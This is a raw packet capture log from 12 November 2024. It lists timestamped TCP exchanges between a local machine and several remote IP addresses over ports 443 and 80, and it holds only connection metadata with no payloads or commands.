Nov 12, 2024 00:06:24.729448080 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.729482889 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.729617119 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.730082035 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:24.730098009 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:24.766616106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:24.766712904 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:24.799551010 CET	443	49793	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.804064989 CET	49793	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.804064989 CET	49793	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.804083109 CET	443	49793	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.804090977 CET	443	49793	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.804126024 CET	49793	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:24.804136992 CET	443	49793	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:24.899005890 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.899039984 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.899149895 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.900000095 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.900033951 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.900084972 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.900520086 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.900536060 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:24.901083946 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:24.901098013 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.070559978 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:25.104358912 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.104645014 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.104652882 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.105003119 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.105530977 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.105623960 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.105839014 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.106410980 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.106704950 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.106714010 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.107043028 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.107393026 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.107472897 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.107614994 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.144371986 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:25.147325039 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.147418976 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:25.147490025 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:25.147519112 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:25.147531986 CET	49786	443	192.168.2.5	40.126.32.68
Nov 12, 2024 00:06:25.147538900 CET	443	49786	40.126.32.68	192.168.2.5
Nov 12, 2024 00:06:25.151331902 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.200745106 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.200817108 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.201042891 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.201221943 CET	49800	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.201235056 CET	443	49800	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.201951981 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.202030897 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.202076912 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.202291012 CET	49799	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.202306032 CET	443	49799	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.229407072 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.230303049 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.230334997 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.230935097 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.230940104 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.242477894 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.242568970 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.243083954 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.243092060 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.243516922 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.243520975 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.243884087 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.243892908 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.243978977 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.244345903 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.244453907 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.244458914 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.244622946 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.244632006 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.245188951 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.245197058 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.245556116 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.245573044 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.246115923 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.246121883 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.323376894 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.323442936 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.323690891 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.323888063 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.323916912 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.323935032 CET	49801	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.323942900 CET	443	49801	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.325120926 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.325516939 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.325535059 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.325711012 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.326270103 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.326282024 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.326570988 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.326626062 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.327447891 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.327548027 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.327985048 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.328011036 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.328113079 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.330091000 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.330168962 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.330593109 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.330696106 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.331027031 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.331037045 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.331090927 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.331098080 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.331295967 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.331332922 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340792894 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340835094 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340861082 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340878963 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340884924 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340909004 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.340926886 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.340941906 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.340985060 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.341137886 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.341156006 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.341167927 CET	49803	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.341173887 CET	443	49803	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.341382980 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.341419935 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.341481924 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.341597080 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.341597080 CET	49802	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.341609955 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.341618061 CET	443	49802	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.342895031 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.342895031 CET	49805	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.342911005 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.342921019 CET	443	49805	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.343807936 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.343807936 CET	49804	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.343827009 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.343836069 CET	443	49804	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.345843077 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.345863104 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.346116066 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.346256018 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.346267939 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.347863913 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.347887039 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.348026991 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.348591089 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.348603010 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.349183083 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.349210978 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.349503040 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.349620104 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.349633932 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.352391005 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.352412939 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.352519989 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.352855921 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.352869987 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.398320913 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.398377895 CET	443	49806	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.398433924 CET	49806	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.399497032 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.399580956 CET	443	49807	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.399679899 CET	49807	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.400141954 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:25.400214911 CET	443	49774	18.244.18.32	192.168.2.5
Nov 12, 2024 00:06:25.400263071 CET	49774	443	192.168.2.5	18.244.18.32
Nov 12, 2024 00:06:25.582297087 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.587287903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.707822084 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.707860947 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.707962036 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.708415985 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.708477974 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.708530903 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.708668947 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.708679914 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.708730936 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.708897114 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.708964109 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.709050894 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.709875107 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.709888935 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.710086107 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.710112095 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.710303068 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.710314035 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.710506916 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:25.710524082 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:25.781651020 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781666040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781677961 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781732082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.781745911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781764984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781765938 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.781778097 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781786919 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.781795025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781807899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781812906 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.781819105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781831980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781840086 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.781847000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.781866074 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.781893969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.782279968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.782329082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.842528105 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:25.842573881 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:25.842641115 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:25.842850924 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:25.842865944 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:25.847323895 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.847909927 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.847935915 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.848464012 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.848468065 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.859536886 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.860299110 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.860307932 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.860884905 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.860888958 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.878710032 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.878770113 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.879092932 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.879117966 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.879143953 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.879542112 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.879558086 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.879941940 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.879947901 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.880078077 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.880084038 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.880558968 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.880575895 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.881630898 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.881637096 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.894522905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894579887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894591093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894603968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894614935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894625902 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894639015 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.894681931 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.894923925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.894968987 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.894996881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895008087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895020962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895030022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.895032883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895046949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895061970 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.895087957 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.895783901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895796061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895811081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895831108 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895833969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.895842075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895853996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.895869970 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.895898104 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.896600962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.896639109 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.896641016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.896653891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.896687984 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.896694899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.896707058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.896718025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:25.896743059 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.896758080 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:25.940160990 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.940301895 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.940378904 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.941350937 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.941370010 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.941380978 CET	49810	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.941385984 CET	443	49810	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.943912029 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.943933010 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.944044113 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.949137926 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.949151039 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.952238083 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.952538013 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.952604055 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.952950954 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.952960014 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.952970982 CET	49811	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.952975988 CET	443	49811	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.965621948 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.965656996 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.965725899 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.971846104 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.971906900 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.971949100 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.971951008 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.972017050 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.972060919 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.972084045 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.972132921 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.972301006 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.972948074 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.972955942 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.973159075 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.973179102 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.973196983 CET	49813	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.973203897 CET	443	49813	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.974277973 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.974292040 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.974370003 CET	49814	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.974374056 CET	443	49814	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.975208044 CET	49812	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.975214005 CET	443	49812	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.981798887 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.981822014 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.981890917 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.982135057 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.982150078 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.983180046 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.983191967 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.983412981 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.984561920 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.984586954 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.984646082 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.984745026 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.984756947 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:25.984889984 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:25.984899998 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.007082939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007103920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007116079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.007154942 CET	49758	80	192.168.2.5	185.215.113.206
